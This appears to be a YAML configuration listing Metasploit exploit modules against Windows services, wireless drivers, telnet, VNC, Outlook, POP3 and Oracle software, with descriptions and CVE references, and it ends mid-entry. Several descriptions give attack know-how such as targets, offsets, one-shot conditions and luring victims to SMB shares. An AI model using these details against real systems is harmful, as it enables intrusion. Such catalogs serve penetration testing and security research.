msf_ms04_011_lsass:
enable: true
msf: true
msf_key: windows/smb/ms04_011_lsass
name: Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the LSASS service, this vulnerability\n\
\t\t\t\twas originally found by eEye. When re-exploiting a Windows XP system, you will\n\
\t\t\t\tneed to run this module twice. DCERPC request fragmentation can be performed by setting\n\
\t\t\t\tthe 'FragSize' parameter.\n\
\t\t\t"
authors:
- - CVE
- 2003-0533
- - OSVDB
- "5248"
- - BID
- "10108"
- - MSB
- MS04-011
path: extensions/metasploit/
class: Msf_module
msf_ms06_070_wkssvc:
enable: true
msf: true
msf_key: windows/smb/ms06_070_wkssvc
name: Microsoft Workstation Service NetpManageIPCConnect Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect\n\
\t\t\t\tfunction using the Workstation service in Windows 2000 SP4 and Windows XP SP2.\n\n\
\t\t\t\tIn order to exploit this vulnerability, you must specify the name of a\n\
\t\t\t\tvalid Windows DOMAIN. It may be possible to satisfy this condition by using\n\
\t\t\t\ta custom dns and ldap setup, however that method is not covered here.\n\n\
\t\t\t\tAlthough Windows XP SP2 is vulnerable, Microsoft reports that Administrator\n\
\t\t\t\tcredentials are required to reach the vulnerable code. Windows XP SP1 only\n\
\t\t\t\trequires valid user credentials. Also, testing shows that a machine already\n\
\t\t\t\tjoined to a domain is not exploitable.\n\
\t\t\t"
authors:
- - CVE
- 2006-4691
- - OSVDB
- "30263"
- - BID
- "20985"
- - MSB
- MS06-070
path: extensions/metasploit/
class: Msf_module
msf_ms05_039_pnp:
enable: true
msf: true
msf_key: windows/smb/ms05_039_pnp
name: Microsoft Plug and Play Service Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Windows Plug\n\
\t\t\t\tand Play service. This vulnerability can be exploited on\n\
\t\t\t\tWindows 2000 without a valid user account.\n\n\
\t\t\t\tNOTE: Since the PnP service runs inside the service.exe process, a failed\n\
\t\t\t\texploit attempt will cause the system to automatically reboot.\n\
\t\t\t"
authors:
- - CVE
- 2005-1983
- - OSVDB
- "18605"
- - BID
- "14513"
- - MSB
- MS05-039
- - URL
- http://www.hsc.fr/ressources/presentations/null_sessions/
path: extensions/metasploit/
class: Msf_module
msf_timbuktu_plughntcommand_bof:
enable: true
msf: true
msf_key: windows/smb/timbuktu_plughntcommand_bof
name: Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6\n\
\t\t\t\tin a pretty novel way.\n\n\
\t\t\t\tThis exploit requires two connections. The first connection is used to leak stack data\n\
\t\t\t\tusing the buffer overflow to overwrite the nNumberOfBytesToWrite argument. By supplying\n\
\t\t\t\ta large value for this argument it is possible to cause Timbuktu to reply to the initial\n\
\t\t\t\trequest with leaked stack data. Using this data allows for reliable exploitation of the\n\
\t\t\t\tbuffer overflow vulnerability.\n\n\
\t\t\t\tProps to Infamous41d for helping in finding this exploitation path.\n\n\
\t\t\t\tThe second connection utilizes the data from the data leak to accurately exploit\n\
\t\t\t\tthe stack based buffer overflow vulnerability.\n\n\
\t\t\t\tTODO:\n\
\t\t\t\thdm suggested using meterpreter's migration capability and restarting the process\n\
\t\t\t\tfor multishot exploitation.\n\
\t\t\t"
authors:
- - CVE
- 2009-1394
- - OSVDB
- "55436"
- - BID
- "35496"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=809
path: extensions/metasploit/
class: Msf_module
msf_netidentity_xtierrpcpipe:
enable: true
msf: true
msf_key: windows/smb/netidentity_xtierrpcpipe
name: Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell's NetIdentity Agent. When sending\n\
\t\t\t\ta specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be\n\
\t\t\t\table to execute arbitrary code. The success of this module is much greater once the\n\
\t\t\t\tservice has been restarted.\n\
\t\t\t"
authors:
- - CVE
- 2009-1350
- - OSVDB
- "53351"
- - BID
- "34400"
- - URL
- http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1
path: extensions/metasploit/
class: Msf_module
msf_ms06_025_rasmans_reg:
enable: true
msf: true
msf_key: windows/smb/ms06_025_rasmans_reg
name: Microsoft RRAS Service RASMAN Registry Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a registry-based stack buffer overflow in the Windows Routing\n\
\t\t\t\tand Remote Access Service. Since the service is hosted inside svchost.exe,\n\
\t\t\t\ta failed exploit attempt can cause other system services to fail as well.\n\
\t\t\t\tA valid username and password is required to exploit this flaw on Windows 2000.\n\
\t\t\t\tWhen attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.\n\
\t\t\t\tExploiting this flaw involves two distinct steps - creating the registry key\n\
\t\t\t\tand then triggering an overwrite based on a read of this key. Once the key is\n\
\t\t\t\tcreated, it cannot be recreated. This means that for any given system, you\n\
\t\t\t\tonly get one chance to exploit this flaw. Picking the wrong target will require\n\
\t\t\t\ta manual removal of the following registry key before you can try again:\n\
\t\t\t\tHKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook\n\
\t\t\t"
authors:
- - CVE
- 2006-2370
- - OSVDB
- "26437"
- - BID
- "18325"
- - MSB
- MS06-025
path: extensions/metasploit/
class: Msf_module
msf_ms09_050_smb2_negotiate_func_index:
enable: true
msf: true
msf_key: windows/smb/ms09_050_smb2_negotiate_func_index
name: Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an out of bounds function table dereference in the SMB\n\
\t\t\t\trequest validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\n\
\t\t\t\trelease candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista\n\
\t\t\t\twithout SP1 does not seem affected by this flaw.\n\
\t\t\t"
authors:
- - MSB
- MS09-050
- - CVE
- 2009-3103
- - BID
- "36299"
- - OSVDB
- "57799"
- - URL
- http://seclists.org/fulldisclosure/2009/Sep/0039.html
- - URL
- http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx
path: extensions/metasploit/
class: Msf_module
msf_ms04_007_killbill:
enable: true
msf: true
msf_key: windows/smb/ms04_007_killbill
name: Microsoft ASN.1 Library Bitstring Heap Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is an exploit for a previously undisclosed\n\
\t\t\t\tvulnerability in the bit string decoding code in the\n\
\t\t\t\tMicrosoft ASN.1 library. This vulnerability is not related\n\
\t\t\t\tto the bit string vulnerability described in eEye advisory\n\
\t\t\t\tAD20040210-2. Both vulnerabilities were fixed in the\n\
\t\t\t\tMS04-007 patch.\n\n\
\t\t\t\tYou are only allowed one attempt with this vulnerability. If\n\
\t\t\t\tthe payload fails to execute, the LSASS system service will\n\
\t\t\t\tcrash and the target system will automatically reboot itself\n\
\t\t\t\tin 60 seconds. If the payload succeeds, the system will no\n\
\t\t\t\tlonger be able to process authentication requests, denying\n\
\t\t\t\tall attempts to login through SMB or at the console. A\n\
\t\t\t\treboot is required to restore proper functioning of an\n\
\t\t\t\texploited system.\n\n\
\t\t\t\tThis exploit has been successfully tested with the win32/*/reverse_tcp\n\
\t\t\t\tpayloads, however a few problems were encountered when using the\n\
\t\t\t\tequivalent bind payloads. Your mileage may vary.\n\n\
\t\t\t"
authors:
- - CVE
- 2003-0818
- - OSVDB
- "3902"
- - BID
- "9633"
- - URL
- http://www.phreedom.org/solar/exploits/msasn1-bitstring/
- - MSB
- MS04-007
path: extensions/metasploit/
class: Msf_module
msf_ms03_049_netapi:
enable: true
msf: true
msf_key: windows/smb/ms03_049_netapi
name: Microsoft Workstation Service NetAddAlternateComputerName Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the NetApi32 NetAddAlternateComputerName\n\
\t\t\t\tfunction using the Workstation service in Windows XP.\n\
\t\t\t"
authors:
- - CVE
- 2003-0812
- - OSVDB
- "11461"
- - BID
- "9011"
- - MSB
- MS03-049
path: extensions/metasploit/
class: Msf_module
msf_ms06_025_rras:
enable: true
msf: true
msf_key: windows/smb/ms06_025_rras
name: Microsoft RRAS Service Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Windows Routing and Remote\n\
\t\t\t\tAccess Service. Since the service is hosted inside svchost.exe, a failed\n\
\t\t\t\texploit attempt can cause other system services to fail as well. A valid\n\
\t\t\t\tusername and password is required to exploit this flaw on Windows 2000.\n\
\t\t\t\tWhen attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.\n\
\t\t\t"
authors:
- - CVE
- 2006-2370
- - OSVDB
- "26437"
- - BID
- "18325"
- - MSB
- MS06-025
path: extensions/metasploit/
class: Msf_module
msf_ms06_066_nwapi:
enable: true
msf: true
msf_key: windows/smb/ms06_066_nwapi
name: Microsoft Services MS06-066 nwapi32.dll
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the svchost service, when the netware\n\
\t\t\t\tclient service is running. This specific vulnerability is in the nwapi32.dll module.\n\
\t\t\t"
authors:
- - CVE
- 2006-4688
- - OSVDB
- "30260"
- - BID
- "21023"
- - MSB
- MS06-066
path: extensions/metasploit/
class: Msf_module
msf_ms06_066_nwwks:
enable: true
msf: true
msf_key: windows/smb/ms06_066_nwwks
name: Microsoft Services MS06-066 nwwks.dll
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the svchost service, when the netware\n\
\t\t\t\tclient service is running. This specific vulnerability is in the nwapi32.dll module.\n\
\t\t\t"
authors:
- - CVE
- 2006-4688
- - OSVDB
- "30260"
- - BID
- "21023"
- - MSB
- MS06-066
path: extensions/metasploit/
class: Msf_module
msf_ms10_061_spoolss:
enable: true
msf: true
msf_key: windows/smb/ms10_061_spoolss
name: Microsoft Print Spooler Service Impersonation Vulnerability
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits the RPC service impersonation vulnerability detailed in\n\
\t\t\t\tMicrosoft Bulletin MS10-061. By making a specific DCE RPC request to the\n\
\t\t\t\tStartDocPrinter procedure, an attacker can impersonate the Printer Spooler service\n\
\t\t\t\tto create a file. The working directory at the time is %SystemRoot%\\system32.\n\
\t\t\t\tAn attacker can specify any file name, including directory traversal or full paths.\n\
\t\t\t\tBy sending WritePrinter requests, an attacker can fully control the content of\n\
\t\t\t\tthe created file.\n\n\
\t\t\t\tIn order to gain code execution, this module writes to a directory used by Windows\n\
\t\t\t\tManagement Instrumentation (WMI) to deploy applications. This directory (Wbem\\Mof)\n\
\t\t\t\tis periodically scanned and any new .mof files are processed automatically. This is\n\
\t\t\t\tthe same technique employed by the Stuxnet code found in the wild.\n\
\t\t\t"
authors:
- - OSVDB
- "67988"
- - CVE
- 2010-2729
- - MSB
- MS10-061
path: extensions/metasploit/
class: Msf_module
msf_psexec:
enable: true
msf: true
msf_key: windows/smb/psexec
name: Microsoft Windows Authenticated User Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module uses a valid administrator username and password (or\n\
\t\t\t\tpassword hash) to execute an arbitrary payload. This module is similar\n\
\t\t\t\tto the \"psexec\" utility provided by SysInternals. This module is now able\n\
\t\t\t\tto clean up after itself. The service created by this tool uses a randomly \n\
\t\t\t\tchosen name and description.\n\
\t\t\t"
authors:
- - CVE
- 1999-0504
- - OSVDB
- "3106"
- - URL
- http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx
path: extensions/metasploit/
class: Msf_module
msf_smb_relay:
enable: true
msf: true
msf_key: windows/smb/smb_relay
name: Microsoft Windows SMB Relay Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module will relay SMB authentication requests to another\n\
\t\t\t\thost, gaining access to an authenticated SMB session if successful.\n\
\t\t\t\tIf the connecting user is an administrator and network logins are\n\
\t\t\t\tallowed to the target machine, this module will execute an arbitrary\n\
\t\t\t\tpayload. To exploit this, the target system must try to authenticate\n\
\t\t\t\tto this module. The easiest way to force a SMB authentication attempt\n\
\t\t\t\tis by embedding a UNC path (\\\\SERVER\\SHARE) into a web page or\n\
\t\t\t\temail message. When the victim views the web page or email, their\n\
\t\t\t\tsystem will automatically connect to the server specified in the UNC\n\
\t\t\t\tshare (the IP address of the system running this module) and attempt\n\
\t\t\t\tto authenticate. Unfortunately, this\n\
\t\t\t\tmodule is not able to clean up after itself. The service and payload\n\
\t\t\t\tfile listed in the output will need to be manually removed after access\n\
\t\t\t\thas been gained. The service created by this tool uses a randomly chosen\n\
\t\t\t\tname and description, so the services list can become cluttered after\n\
\t\t\t\trepeated exploitation.\n\n\
\t\t\t\tThe SMB authentication relay attack was first reported by Sir Dystic on\n\
\t\t\t\tMarch 31st, 2001 at @lanta.con in Atlanta, Georgia.\n\n\
\t\t\t\tOn November 11th 2008 Microsoft released bulletin MS08-068. This bulletin\n\
\t\t\t\tincludes a patch which prevents the relaying of challenge keys back to\n\
\t\t\t\tthe host which issued them, preventing this exploit from working in\n\
\t\t\t\tthe default configuration. It is still possible to set the SMBHOST\n\
\t\t\t\tparameter to a third-party host that the victim is authorized to access,\n\
\t\t\t\tbut the \"reflection\" attack has been effectively broken.\n\
\t\t\t"
authors:
- - CVE
- 2008-4037
- - OSVDB
- "49736"
- - MSB
- MS08-068
- - URL
- http://blogs.technet.com/swi/archive/2008/11/11/smb-credential-reflection.aspx
- - URL
- http://en.wikipedia.org/wiki/SMBRelay
- - URL
- http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx
- - URL
- http://www.xfocus.net/articles/200305/smbrelay.html
path: extensions/metasploit/
class: Msf_module
msf_ms08_067_netapi:
enable: true
msf: true
msf_key: windows/smb/ms08_067_netapi
name: Microsoft Server Service Relative Path Stack Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a parsing flaw in the path canonicalization code of\n\
\t\t\t\tNetAPI32.dll through the Server Service. This module is capable of bypassing\n\
\t\t\t\tNX on some operating systems and service packs. The correct target must be\n\
\t\t\t\tused to prevent the Server Service (along with a dozen others in the same\n\
\t\t\t\tprocess) from crashing. Windows XP targets seem to handle multiple successful\n\
\t\t\t\texploitation events, but 2003 targets will often crash or hang on subsequent\n\
\t\t\t\tattempts. This is just the first version of this module, full support for\n\
\t\t\t\tNX bypass on 2003, along with other platforms, is still in development.\n\
\t\t\t"
authors:
- - CVE
- 2008-4250
- - OSVDB
- "49243"
- - MSB
- MS08-067
- - NEXPOSE
- dcerpc-ms-netapi-netpathcanonicalize-dos
path: extensions/metasploit/
class: Msf_module
msf_ms06_040_netapi:
enable: true
msf: true
msf_key: windows/smb/ms06_040_netapi
name: Microsoft Server Service NetpwPathCanonicalize Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function\n\
\t\t\t\tusing the NetpwPathCanonicalize RPC call in the Server Service. It is likely that\n\
\t\t\t\tother RPC calls could be used to exploit this service. This exploit will result in\n\
\t\t\t\ta denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt\n\
\t\t\t\twill likely result in a complete reboot on Windows 2000 and the termination of all\n\
\t\t\t\tSMB-related services on Windows XP. The default target for this exploit should succeed\n\
\t\t\t\ton Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.\n\
\t\t\t"
authors:
- - CVE
- 2006-3439
- - OSVDB
- "27845"
- - BID
- "19409"
- - MSB
- MS06-040
path: extensions/metasploit/
class: Msf_module
msf_netgear_wg111_beacon:
enable: true
msf: true
msf_key: windows/driver/netgear_wg111_beacon
name: NetGear WG111v2 Wireless Driver Long Beacon Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the NetGear WG111v2 wireless\n\
\t\t\t\tdevice driver. This stack buffer overflow allows remote code execution in kernel mode.\n\
\t\t\t\tThe stack buffer overflow is triggered when a 802.11 Beacon frame is received that\n\
\t\t\t\tcontains more than 1100 bytes worth of information elements.\n\n\
\t\t\t\tThis exploit was tested with version 5.1213.6.316 of the WG111v2.SYS driver and\n\
\t\t\t\ta NetGear WG111v2 USB adapter. Since this vulnerability is exploited via beacon frames,\n\
\t\t\t\tall cards within range of the attack will be affected. The tested adapter used\n\
\t\t\t\ta MAC address in the range of 00:18:4d:02:XX:XX.\n\n\
\t\t\t\tVulnerable clients will need to have their card in a non-associated state\n\
\t\t\t\tfor this exploit to work. The easiest way to reproduce this bug is by starting\n\
\t\t\t\tthe exploit and then unplugging and reinserting the USB card. The exploit can\n\
\t\t\t\ttake up to a minute to execute the payload, depending on system activity.\n\n\
\t\t\t\tNetGear was NOT contacted about this flaw. A search of the SecurityFocus\n\
\t\t\t\tdatabase indicates that NetGear has not provided an official patch or\n\
\t\t\t\tsolution for any of the thirty flaws listed at the time of writing. This list\n\
\t\t\t\tincludes BIDs: 1010, 3876, 4024, 4111, 5036, 5667, 5830, 5943, 5940, 6807, 7267, 7270,\n\
\t\t\t\t7371, 7367, 9194, 10404, 10459, 10585, 10935, 11580, 11634, 12447, 15816, 16837,\n\
\t\t\t\t16835, 19468, and 19973.\n\n\
\t\t\t\tThis module depends on the Lorcon2 library and only works on the Linux platform\n\
\t\t\t\twith a supported wireless card. Please see the Ruby Lorcon2 documentation\n\
\t\t\t\t(external/ruby-lorcon/README) for more information.\n\
\t\t\t"
authors:
- - CVE
- 2006-5972
- - OSVDB
- "30473"
- - URL
- http://projects.info-pull.com/mokb/MOKB-16-11-2006.html
path: extensions/metasploit/
class: Msf_module
msf_broadcom_wifi_ssid:
enable: true
msf: true
msf_key: windows/driver/broadcom_wifi_ssid
name: Broadcom Wireless Driver Probe Response SSID Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Broadcom Wireless driver\n\
\t\t\t\tthat allows remote code execution in kernel mode by sending a 802.11 probe\n\
\t\t\t\tresponse that contains a long SSID. The target MAC address must\n\
\t\t\t\tbe provided to use this exploit. The two cards tested fell into the\n\
\t\t\t\t00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges.\n\n\
\t\t\t\tThis module depends on the Lorcon2 library and only works on the Linux platform\n\
\t\t\t\twith a supported wireless card. Please see the Ruby Lorcon2 documentation\n\
\t\t\t\t(external/ruby-lorcon/README) for more information.\n\
\t\t\t"
authors:
- - CVE
- 2006-5882
- - OSVDB
- "30294"
- - URL
- http://projects.info-pull.com/mokb/MOKB-11-11-2006.html
path: extensions/metasploit/
class: Msf_module
msf_dlink_wifi_rates:
enable: true
msf: true
msf_key: windows/driver/dlink_wifi_rates
name: D-Link DWL-G132 Wireless Driver Beacon Rates Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the A5AGU.SYS driver provided\n\
\t\t\t\twith the D-Link DWL-G132 USB wireless adapter. This stack buffer overflow\n\
\t\t\t\tallows remote code execution in kernel mode. The stack buffer overflow is triggered\n\
\t\t\t\twhen a 802.11 Beacon frame is received that contains a long Rates information\n\
\t\t\t\telement. This exploit was tested with version 1.0.1.41 of the\n\
\t\t\t\tA5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer\n\
\t\t\t\tversions of the A5AGU.SYS driver are provided with the D-Link WUA-2340\n\
\t\t\t\tadapter and appear to resolve this flaw, but D-Link does not offer an updated\n\
\t\t\t\tdriver for the DWL-G132. Since this vulnerability is exploited via beacon frames,\n\
\t\t\t\tall cards within range of the attack will be affected. The tested adapter used\n\
\t\t\t\ta MAC address in the range of 00:11:95:f2:XX:XX.\n\n\
\t\t\t\tVulnerable clients will need to have their card in a non-associated state\n\
\t\t\t\tfor this exploit to work. The easiest way to reproduce this bug is by starting\n\
\t\t\t\tthe exploit and then accessing the Windows wireless network browser and\n\
\t\t\t\tforcing it to refresh.\n\n\
\t\t\t\tD-Link was NOT contacted about this flaw. A search of the SecurityFocus\n\
\t\t\t\tdatabase indicates that D-Link has not provided an official patch or\n\
\t\t\t\tsolution for any of the seven flaws listed at the time of writing:\n\
\t\t\t\t(BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689).\n\n\
\t\t\t\tAs of November 17th, 2006, D-Link has fixed the flaw in the latest version of the\n\
\t\t\t\tDWL-G132 driver (v1.21).\n\n\
\t\t\t\tThis module depends on the Lorcon2 library and only works on the Linux platform\n\
\t\t\t\twith a supported wireless card. Please see the Ruby Lorcon2 documentation\n\
\t\t\t\t(external/ruby-lorcon/README) for more information.\n\
\t\t\t"
authors:
- - CVE
- 2006-6055
- - OSVDB
- "30296"
- - URL
- http://projects.info-pull.com/mokb/MOKB-13-11-2006.html
- - URL
- ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip
path: extensions/metasploit/
class: Msf_module
msf_goodtech_telnet:
enable: true
msf: true
msf_key: windows/telnet/goodtech_telnet
name: GoodTech Telnet Server <= 5.0.6 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in GoodTech Systems Telnet Server\n\
\t\t\t\tversions prior to 5.0.7. By sending an overly long string, an attacker can\n\
\t\t\t\toverwrite the buffer and control program execution.\n\
\t\t\t"
authors:
- - CVE
- 2005-0768
- - OSVDB
- "14806"
- - BID
- "12815"
path: extensions/metasploit/
class: Msf_module
msf_gamsoft_telsrv_username:
enable: true
msf: true
msf_key: windows/telnet/gamsoft_telsrv_username
name: GAMSoft TelSrv 1.5 Username Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a username sprintf stack buffer overflow in GAMSoft TelSrv 1.5.\n\
\t\t\t\tOther versions may also be affected. The service terminates after exploitation,\n\
\t\t\t\tso you only get one chance!\n\
\t\t\t"
authors:
- - CVE
- 2000-0665
- - OSVDB
- "373"
- - BID
- "1478"
- - URL
- http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip
path: extensions/metasploit/
class: Msf_module
msf_postgres_payload:
enable: true
msf: true
msf_key: windows/postgres/postgres_payload
name: PostgreSQL for Microsoft Windows Payload Execution
category: Metasploit
description: "\n\
\t\t\t\tThis module creates and enables a custom UDF (user defined function) on the\n\
\t\t\t\ttarget host via the UPDATE pg_largeobject method of binary injection. On\n\
\t\t\t\tdefault Microsoft Windows installations of PostgreSQL (=< 8.4), the postgres\n\
\t\t\t\tservice account may write to the Windows temp directory, and may source\n\
\t\t\t\tUDF DLL's from there as well.\n\n\
\t\t\t\tPostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on Microsoft Windows (32-bit) are \n\
\t\t\t\tvalid targets for this module.\n\n\
\t\t\t\tNOTE: This module will leave a payload executable on the target system when the\n\
\t\t\t\tattack is finished, as well as the UDF DLL and the OID.\n\
\t\t\t"
authors: []
path: extensions/metasploit/
class: Msf_module
msf_winvnc_http_get:
enable: true
msf: true
msf_key: windows/vnc/winvnc_http_get
name: WinVNC Web Server <= v3.3.3r7 GET Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a buffer overflow in the AT&T WinVNC version\n\
\t\t\t\t<= v3.3.3r7 web server. When debugging mode with logging is\n\
\t\t\t\tenabled (non-default), an overly long GET request can overwrite\n\
\t\t\t\tthe stack. This exploit does not work well with VNC payloads!\n\
\t\t\t"
authors:
- - BID
- "2306"
- - OSVDB
- "6280"
- - CVE
- 2001-0168
path: extensions/metasploit/
class: Msf_module
msf_realvnc_client:
enable: true
msf: true
msf_key: windows/vnc/realvnc_client
name: RealVNC 3.3.7 Client Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).\n\
\t\t\t"
authors:
- - CVE
- 2001-0167
- - OSVDB
- "6281"
- - BID
- "2305"
path: extensions/metasploit/
class: Msf_module
msf_ultravnc_client:
enable: true
msf: true
msf_key: windows/vnc/ultravnc_client
name: UltraVNC 1.0.1 Client Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a buffer overflow in UltraVNC Win32\n\
\t\t\t\tViewer 1.0.1 Release.\n\
\t\t\t"
authors:
- - CVE
- 2006-1652
- - OSVDB
- "24456"
- - BID
- "17378"
path: extensions/metasploit/
class: Msf_module
msf_ms10_045_outlook_ref_only:
enable: true
msf: true
msf_key: windows/email/ms10_045_outlook_ref_only
name: Outlook ATTACH_BY_REF_ONLY File Execution
category: Metasploit
description: "\n\
\t\t\t\tIt has been discovered that certain e-mail messages cause Outlook to create Windows\n\
\t\t\t\tshortcut-like attachments or messages within Outlook. Through specially crafted TNEF\n\
\t\t\t\tstreams with certain MAPI attachment properties, it is possible to set a path name\n\
\t\t\t\tto files to be executed. When a user double clicks on such an attachment or message,\n\
\t\t\t\tOutlook will proceed to execute the file that is set by the path name value. These\n\
\t\t\t\tfiles can be local files, but also files stored remotely, for example on a file share.\n\
\t\t\t\tExploitation is limited by the fact that it is not possible for attackers to supply\n\
\t\t\t\tcommand line options.\n\
\t\t\t"
authors:
- - MSB
- MS10-045
- - CVE
- 2010-0266
- - OSVDB
- "66296"
- - BID
- "41446"
- - URL
- http://www.akitasecurity.nl/advisory.php?id=AK20091001
path: extensions/metasploit/
class: Msf_module
msf_ms10_045_outlook_ref_resolve:
enable: true
msf: true
msf_key: windows/email/ms10_045_outlook_ref_resolve
name: Outlook ATTACH_BY_REF_RESOLVE File Execution
category: Metasploit
description: "\n\
\t\t\t\tIt has been discovered that certain e-mail messages cause Outlook to create Windows\n\
\t\t\t\tshortcut-like attachments or messages within Outlook. Through specially crafted TNEF\n\
\t\t\t\tstreams with certain MAPI attachment properties, it is possible to set a path name\n\
\t\t\t\tto files to be executed. When a user double clicks on such an attachment or message,\n\
\t\t\t\tOutlook will proceed to execute the file that is set by the path name value. These\n\
\t\t\t\tfiles can be local files, but also files stored remotely, for example on a file share.\n\
\t\t\t\tExploitation is limited by the fact that it is not possible for attackers to supply\n\
\t\t\t\tcommand line options.\n\
\t\t\t"
authors:
- - MSB
- MS10-045
- - CVE
- 2010-0266
- - OSVDB
- "66296"
- - BID
- "41446"
- - URL
- http://www.akitasecurity.nl/advisory.php?id=AK20091001
path: extensions/metasploit/
class: Msf_module
msf_seattlelab_pass:
enable: true
msf: true
msf_key: windows/pop3/seattlelab_pass
name: Seattle Lab Mail 5.5 POP3 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThere exists an unauthenticated buffer overflow vulnerability\n\
\t\t\t\tin the POP3 server of Seattle Lab Mail 5.5 when sending a password\n\
\t\t\t\twith excessive length.\n\n\
\t\t\t\tSuccessful exploitation should not crash either the\n\
\t\t\t\tservice or the server; however, after initial use the\n\
\t\t\t\tport cannot be reused for successive exploitation until\n\
\t\t\t\tthe service has been restarted. Consider using a command\n\
\t\t\t\texecution payload following the bind shell to restart\n\
\t\t\t\tthe service if you need to reuse the same port.\n\n\
\t\t\t\tThe overflow appears to occur in the debugging/error reporting\n\
\t\t\t\tsection of the slmail.exe executable, and there are multiple\n\
\t\t\t\toffsets that will lead to successful exploitation. This exploit\n\
\t\t\t\tuses 2606, the offset that creates the smallest overall payload.\n\
\t\t\t\tThe other offset is 4654.\n\n\
\t\t\t\tThe return address is overwritten with a \"jmp esp\" call from the\n\
\t\t\t\tapplication library SLMFC.DLL found in %SYSTEM%\\system32\\. This\n\
\t\t\t\treturn address works against all versions of Windows and service packs.\n\n\
\t\t\t\tThe last modification date on the library is dated 06/02/99. Assuming\n\
\t\t\t\tthat the code where the overflow occurs has not changed in some time,\n\
\t\t\t\tprior versions of SLMail may also be vulnerable to this exploit. The\n\
\t\t\t\tauthor has not been able to acquire older versions of SLMail for\n\
\t\t\t\ttesting purposes. Please let us know if you were able to get this\n\
\t\t\t\texploit working against other SLMail versions.\n\
\t\t\t"
authors:
- - CVE
- 2003-0264
- - OSVDB
- "11975"
- - BID
- "7519"
path: extensions/metasploit/
class: Msf_module
msf_tns_arguments:
enable: true
msf: true
msf_key: windows/oracle/tns_arguments
name: Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Oracle 8i. When\n\
\t\t\t\tsending a specially crafted packet containing an overly long\n\
\t\t\t\tARGUMENTS string to the TNS service, an attacker may be able\n\
\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2001-0499
- - OSVDB
- "9427"
- - BID
- "2941"
path: extensions/metasploit/
class: Msf_module
msf_osb_ndmp_auth:
enable: true
msf: true
msf_key: windows/oracle/osb_ndmp_auth
name: Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThe module exploits a stack buffer overflow in Oracle Secure Backup.\n\
\t\t\t\tWhen sending a specially crafted NDMP_CONNECT_CLIENT_AUTH packet,\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-5444
- - OSVDB
- "51340"
- - URL
- http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
path: extensions/metasploit/
class: Msf_module
msf_tns_service_name:
enable: true
msf: true
msf_key: windows/oracle/tns_service_name
name: Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Oracle. When\n\
\t\t\t\tsending a specially crafted packet containing a long SERVICE_NAME\n\
